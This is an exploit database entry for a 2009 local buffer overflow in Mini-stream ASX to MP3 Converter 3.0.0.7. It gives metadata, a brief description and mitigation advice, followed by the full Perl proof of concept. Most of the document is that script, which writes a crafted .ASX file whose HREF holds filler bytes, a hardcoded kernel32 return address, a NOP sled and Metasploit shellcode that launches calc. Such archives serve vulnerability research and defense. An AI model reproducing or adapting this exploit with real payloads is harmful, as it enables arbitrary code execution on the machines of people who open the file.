Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit

vendor:

ASX to MP3 Converter

by:

G4N0K

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: ASX to MP3 Converter

Affected Version From: 3.0.0.7

Affected Version To: 3.0.0.7

Patch Exists: NO

Related CWE:

CPE: a:mini-stream:asx_to_mp3_converter:3.0.0.7

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2

2009

Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit

This exploit takes advantage of a buffer overflow vulnerability in Mini-stream ASX to MP3 Converter 3.0.0.7. By providing a specially crafted .ASX file with a long HREF value, an attacker can overflow the buffer and execute arbitrary code. This exploit has been tested on Windows XP SP2.

Mitigation:

Apply the latest patch or upgrade to a newer version of the software. Avoid opening untrusted .ASX files.

Source

Exploit-DB raw data:

#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             
==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran

==============================================================================
	Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
==============================================================================
	[Â»] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
	[Â»] Website:............[ http://mini-stream.net/ ].....................
	[Â»] Today:..............[ 07052009 ]....................................
	[Â»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
==============================================================================

	[x] tested on Windows XP SP2...
	[x] if you are not able to make this shit work, just put it in the Base/Root
	    of a Drive/Partition, like "C:\gnk.asx"...

=cut

my $MSD = "G" x 26110;
my $SMN = "\x90" x 16;
my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";

my $ASX = 
"<asx version=\"3.0\">
  <title>Title is not important.</title>
  <entry>
    <title>Example...</title>
    <ref href=\"".$MSD.$RA.$SMN.$Shcode."\" />
    <author>G4N0K</author>
    <copyright>Â©2009 G4N0K</copyright>
  </entry>
</asx>";

  open(ASX,'>>gnk.asx');
  print ASX $ASX;
  close(ASX);

# milw0rm.com [2009-05-07]